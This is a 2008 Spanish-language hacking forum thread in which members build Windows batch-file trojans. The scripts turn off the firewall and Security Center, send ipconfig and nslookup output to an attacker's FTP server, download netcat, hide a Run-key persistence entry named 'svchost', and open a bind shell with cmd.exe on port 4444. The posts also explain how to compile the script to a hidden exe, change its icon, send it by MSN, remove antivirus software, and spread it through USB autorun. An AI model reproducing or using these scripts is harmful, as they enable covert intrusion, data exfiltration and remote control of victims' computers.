Hola Visitante

Autor Tema: Código .bat -Distintas actividades-  (Leído 5558 veces)

NachoPistacho

  • Full Member
  • ***
  • Mensajes: 161
    • Ver Perfil
Código .bat -Distintas actividades-
« en: Diciembre 16, 2008, 11:05:34 am »
Bueno ya que ando trasteando con los .bat, pongo lo que estoy haciendo, aunque es algo muy básico si alguien empieza seguro que le sirve ^^!

1- Actividad: Obtener información.

Un código en bat, que al enviarlo a una de nuestras maquinas nos mande a nuestro FTP, un \"ipconfig /all\" y un \"nslookup\":
\"ipconfig /all\", nos dará información como puede ser su nombre de host, si tiene el DHCP habilitado, dispositivos de red etc.
\"nslookup\" nos dará básicamente la ip pública.

Bien antes que nada tenéis que crearos una cuenta FTP, yo me la e creado aquí aunque puedes elegir cualquier otro.
Pongo el código con un poco de explicación:

Código: [Seleccionar]
1 @echo off
2 cls
3 net stop \"Centro de Seguridad\"
4 net stop SharedAccess
5 echo CuentaFTP>%systemroot%\\\\1.txt
6 echo ContraseñaFTP>%systemroot%\\\\2.txt
7 echo send %systemroot%\\\\ipconfig.txt>%systemroot%\\\\3.txt
8 echo send %systemroot%\\\\nslookup.txt>%systemroot%\\\\4.txt
9 echo bye>%systemroot%\\\\5.txt
10 ipconfig /all>%systemroot%\\\\ipconfig.txt
11 nslookup www.google.com>%systemroot%\\\\nslookup.txt
12 copy /b %systemroot%\\\\1.txt %systemroot%\\\\datos.txt
13 copy /b %systemroot%\\\\datos.txt+%systemroot%\\\\2.txt %systemroot%\\\\datos.txt
14 copy /b %systemroot%\\\\datos.txt+%systemroot%\\\\3.txt %systemroot%\\\\datos.txt
15 copy /b %systemroot%\\\\datos.txt+%systemroot%\\\\4.txt %systemroot%\\\\datos.txt
16 copy /b %systemroot%\\\\datos.txt+%systemroot%\\\\5.txt %systemroot%\\\\datos.txt
17 ftp -s:%systemroot%\\\\datos.txt ftp.NuestroFTP.com
18 del %systemroot%\\\\1.txt
19 del %systemroot%\\\\2.txt
20 del %systemroot%\\\\3.txt
21 del %systemroot%\\\\4.txt
21 del %systemroot%\\\\5.txt
22 del %systemroot%\\\\datos.txt
23 del %systemroot%\\\\ipconfig.txt
24 del %systemroot%\\\\nslookup.txt
25 net start SharedAccess
26 net start \"Centro de Seguridad\"


Explicación:

3- En esta linea desactivamos el \"Centro de seguridad de Windows\"
4- En esta linea desactivamos el \"Firewall de Windows\"

Nota: En un principio no ponía estas lineas pero los archivos llegaban al FTP en blanco entonces es por el firewall, por eso ay que desactivarlo...

5- En esta linea guardamos la cuenta de nuestro FTP en un archivo que lo llamaremos \"1.txt\"
6- En esta linea guardamos la contraseña de nuestro FTP en un archivo que lo llamaremos \"2.txt\"
7- Le señalamos los archivos a enviar
8- Le señalamos los archivos a enviar
9- En esta linea ponemos bye, que se guardara en 5.txt, es para cerrar el FTP
10- Ejecuta el comando \"ipconfig /all\", lo guarda en \"%systemroot%\" y lo llama ipconfig.txt
11- Ejecuta el comando \"nslookup www.google.es\", lo guarda en \"%systemroot%\" y lo llama nslookup.txt
12-16 Une todos los archivos en uno llamado \"datos.txt\" que son los que usara el FTP
17- Le indicamos al FTP donde estan los datos que necesita para conectarse, y el FTP \"ftp.NuestroFTP.com\"
18-24 Estas lineas borran todos los archivos creados en \"%systemroot%\"
25- En esta linea activamos el \"Centro de seguridad de Windows\"
26- En esta linea activamos el \"Firewall de Windows\"

Nota: %systemroot%: es el directorio principal, lo que equivale a \"C\", pero como no todos los ordenadores le llaman \"C\" a la unidad principal, \"%systemroot%\" lo que hace es coger la unidad donde aya el S.O, podéis poner C:\\\\ si os gusta mas...

Si alguien ve que se puede optimizar el código para que tenga menos lineas y tal que lo diga ^^!

Agradecimientos:
Berni69 por el comando nslookup ^^





Berni69

  • Administrator
  • *****
  • Mensajes: 25
    • Ver Perfil
Re: Código .bat para obtener informacón de una de nuestras maquinas.
« Respuesta #1 en: Diciembre 16, 2008, 03:31:00 pm »
Interesante,... luego lo probare ;)

a ver si podemos añadirle algo mas  ;)

Berni69

  • Administrator
  • *****
  • Mensajes: 25
    • Ver Perfil
Re: Código .bat para obtener informacón de una de nuestras maquinas.
« Respuesta #2 en: Diciembre 17, 2008, 03:47:21 pm »
de podria hacer dejar un netcat a la escucha *-) y con un autorun.inf hacer que se ejecutara desde el pendrive....  lalala

tambien seria util copiar en la carpeta de inicio que siempre se ejecutara un netcat o desde el registro.....

jejeje, esto seria la manera de colar un 'troyano' o algo parecido.... :P

NachoPistacho

  • Full Member
  • ***
  • Mensajes: 161
    • Ver Perfil
Código .bat -Distintas actividades-
« Respuesta #3 en: Diciembre 20, 2008, 09:56:11 am »
2- Actividad: Descargar netcat en la maquina, dejarlo a la escucha y añadirlo al registro.

Para esta actividad se necesitan tres cosas:

Fast exe batch maker

Reshacker

Netcat


Código: [Seleccionar]
@echo off
cls
net stop \"Centro de Seguridad\"
net stop SharedAccess

cd \"%homedrive%%homepath%\\\\Mis documentos\\\\Mis archivos recibidos\"
copy nombre.exe %homedrive%\\\\Windows\\\\system32\\\\

copy nombre.exe>\"%systemroot%\\\\windows\\\\system32\\\\nombre.exe\"
REG ADD HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v svchost /d \"%systemroot%\\\\windows\\\\system32\\\\nombre.exe\"

echo NombreFTP>%systemroot%\\\\1.txt
echo ContraseñaFTP>%systemroot%\\\\2.txt

echo send %systemroot%\\\\ipconfig.txt>%systemroot%\\\\3.txt
echo send %systemroot%\\\\nslookup.txt>%systemroot%\\\\4.txt

pushd %homedrive%\\\\Windows\\\\system32
echo get %systemroot%\\\\nc.exe>%systemroot%\\\\5.txt

echo bye>%systemroot%\\\\6.txt

ipconfig /all>%systemroot%\\\\ipconfig.txt
nslookup www.google.com>%systemroot%\\\\nslookup.txt

copy /b %systemroot%\\\\1.txt %systemroot%\\\\datos.txt
copy /b %systemroot%\\\\datos.txt+%systemroot%\\\\2.txt %systemroot%\\\\datos.txt
copy /b %systemroot%\\\\datos.txt+%systemroot%\\\\3.txt %systemroot%\\\\datos.txt
copy /b %systemroot%\\\\datos.txt+%systemroot%\\\\4.txt %systemroot%\\\\datos.txt
copy /b %systemroot%\\\\datos.txt+%systemroot%\\\\5.txt %systemroot%\\\\datos.txt
copy /b %systemroot%\\\\datos.txt+%systemroot%\\\\6.txt %systemroot%\\\\datos.txt

ftp -s:%systemroot%\\\\datos.txt ftp.NuestroFTP.com

del %systemroot%\\\\1.txt
del %systemroot%\\\\2.txt
del %systemroot%\\\\3.txt
del %systemroot%\\\\4.txt
del %systemroot%\\\\5.txt
del %systemroot%\\\\6.txt
del %systemroot%\\\\datos.txt
del %systemroot%\\\\ipconfig.txt
del %systemroot%\\\\nslookup.txt

nc -L -p 4444 -e cmd.exe

net start SharedAccess
net start \"Centro de Seguridad\"

del \"%homedrive%%homepath%\\\\Mis documentos\\\\Mis archivos recibidos\\\\nombre.rar\"
del \"%homedrive%%homepath%\\\\Mis documentos\\\\Mis archivos recibidos\\\\nombre.exe\"



Explicación:
Este código a diferencia del de arriba añade el archivo al registro de windows, se descarga netcat y lo deja a la escucha, pero me falta una pequeña cosa que no consigo y es que antes de copiar el archivo a la system32, compruebe si este existe este y si existe siga con el siguiente paso, e probado con el \"IF\" pero no me sale xD! A ver si alguien puede completar esa parte.

Nota: comprobar si existe es esencial ya que al terminar se borran los dos, de mis archivos recibidos pero no nos olvidemos que esta añadido al registro con lo que cuando se inicie el ordenador este intentara copiar el archivo a la system32 y este ya no existe con lo que daría error.

Bueno el funcionamiento de este es un poco mas complejo ya que una vez creado el .rar (que dentro contiene el.exe), se supone que el .rar, se encuentra en mis archivos recibidos, se descomprime y tenemos dos archivos, nombre.rar y nombre.exe, se ejecuta nombre.exe y este se copia a system32 y al final borra los dos automáticamente de mis archivos recibidos...

Nota: Una vez este descargado el netcat en la maquina si esta tiene antivirus puede que no lo borre o lo anule asta que se ejecute con lo que se deberían cerrar/borrar los antivirus que también se puede hacer con el mismo .bat, con eso ya que se espabile cada uno.

Una vez tengamos el .bat creado pasaremos a pasarlo a .exe con el Fast exe batch maker, es muy fácil se ejecuta el compilador marcamos la opción modo oculto ponemos el directorio del .bat, le damos a compilar y lo guardamos con nombre.exe

Después de esto pasamos a cambiarle el icono no es necesario pero allá cada uno, abrimos el reshacker vamos a file>open>nombre.exe, luego pasamos a actions>replace icon seleccionamos el icono que queramos y lo guardamos en file>save as>nombre.exe

Con esto ya estaría todo solo faltaría pasarlo a .rar y enviarlo.

Nota: El FTP que facilité arriba borra automáticamente el netcat.exe pero no al momento de subirlo si no que tarda X en borrarlo, puedes buscar otro FTP que no lo borre o subirlo, antes de enviar el archivo a la otra maquina...




Berni69

  • Administrator
  • *****
  • Mensajes: 25
    • Ver Perfil
Re: Código .bat -Distintas actividades-
« Respuesta #4 en: Diciembre 20, 2008, 10:12:10 am »
se puede dejar siempre el netcat a la escuchasin necesidad de borrarlo... *-)

otra cosa que no me queda clara porque en mis archivos recibidos y no en %temp%  ;)

y en rar?? no seria mas facil descargarse un wget desde el servidor ftp y despues que el wget descargue los archivos ??

hasta aqui mis dudas en la calase de hoy hjeje

NachoPistacho

  • Full Member
  • ***
  • Mensajes: 161
    • Ver Perfil
Re: Código .bat -Distintas actividades-
« Respuesta #5 en: Diciembre 20, 2008, 10:21:35 am »
El código lo e puesto pensando en la forma en la que yo enviaría el archivo que es \"nombre.rar\" (que dentro tiene nombre.exe) que seria por msn, el msn los archivos que recibe los guarda en \"mis archivos recibidos\" por lo que yo e partido de esa ruta....

Y el .rar es por el mismo motivo, no puedes pasar un .bat si no que tiene que ser un.rar, en este caso el .rar solo sirve para poder enviarlo para nada mas.

En este caso solo se borrarían los archivos que recibe la otra maquina por el msn que seria nombre.rar y el que contiene dentro que es nombre.exe, el netcat se descarga en la system32 y ya no se toca mas.

No se si aclara tus dudas jeje, si no es asi dimelo :P

Berni69

  • Administrator
  • *****
  • Mensajes: 25
    • Ver Perfil
Re: Código .bat -Distintas actividades-
« Respuesta #6 en: Diciembre 20, 2008, 10:25:36 am »
ahhhh

lo que yo queria hacer era propagar esto por usb... :P

NachoPistacho

  • Full Member
  • ***
  • Mensajes: 161
    • Ver Perfil
Re: Código .bat -Distintas actividades-
« Respuesta #7 en: Diciembre 20, 2008, 10:28:03 am »

ahhhh

lo que yo queria hacer era propagar esto por usb... :P


Supongo que también se puede hacer, lo mirare, tu idea que seria poner el USB y que se ejecutara todo solo sin necesidad de tocar nada mas?

Berni69

  • Administrator
  • *****
  • Mensajes: 25
    • Ver Perfil
Re: Código .bat -Distintas actividades-
« Respuesta #8 en: Diciembre 20, 2008, 12:36:15 pm »
Citar
AutoRun en Microsoft Windows [editar]

En Windows, los parámetros de autoejecución se definen en un documento de texto sin formato llamado Autorun.inf o Autorun.ini, que se debe guardar en la carpeta principal de la unidad en cuestión.

Estructura [editar]

Código: [Seleccionar]
[AutoRun]
open=setup.exe
Label=Etiqueta_Unidad
icon=Nombreicono.extension
...

[Content]
MusicFiles=Y PictureFiles=0 VideoFiles=false

[ExclusiveContentPaths]
carpeta1
carpeta2
\\\\carpeta3\\\\subcarpeta

[IgnoreContentPaths]
carpeta4
\\\\carpeta2\\\\subcarpeta5

[DeviceInstall]
DriverPath=CarpetaControladores


onwheels256

  • Administrator
  • *****
  • Mensajes: 172
    • Ver Perfil
Re: Código .bat -Distintas actividades-
« Respuesta #9 en: Diciembre 29, 2008, 06:32:23 pm »
una pregunta he estado miradon por ahi y poniendo :
reg add HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v NOMBRE_CUALQUI ERA /d \"c:\\\\tubat.bat\"
tendriamos registrado elbat para cada vez que enciendas se ejecute
me podeis decir si esta bien

NachoPistacho

  • Full Member
  • ***
  • Mensajes: 161
    • Ver Perfil
Re: Código .bat -Distintas actividades-
« Respuesta #10 en: Diciembre 29, 2008, 09:29:57 pm »

una pregunta he estado miradon por ahi y poniendo :
reg add HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v NOMBRE_CUALQUI ERA /d \"c:\\\\tubat.bat\"
tendriamos registrado elbat para cada vez que enciendas se ejecute
me podeis decir si esta bien



pues no tengo ni idea la verdad, yo busque cual seria la ruta para añadir el .bat junto con el inicio de windows y encontré esa ruta en Internet, de todas formas pruebalo haber si se añade.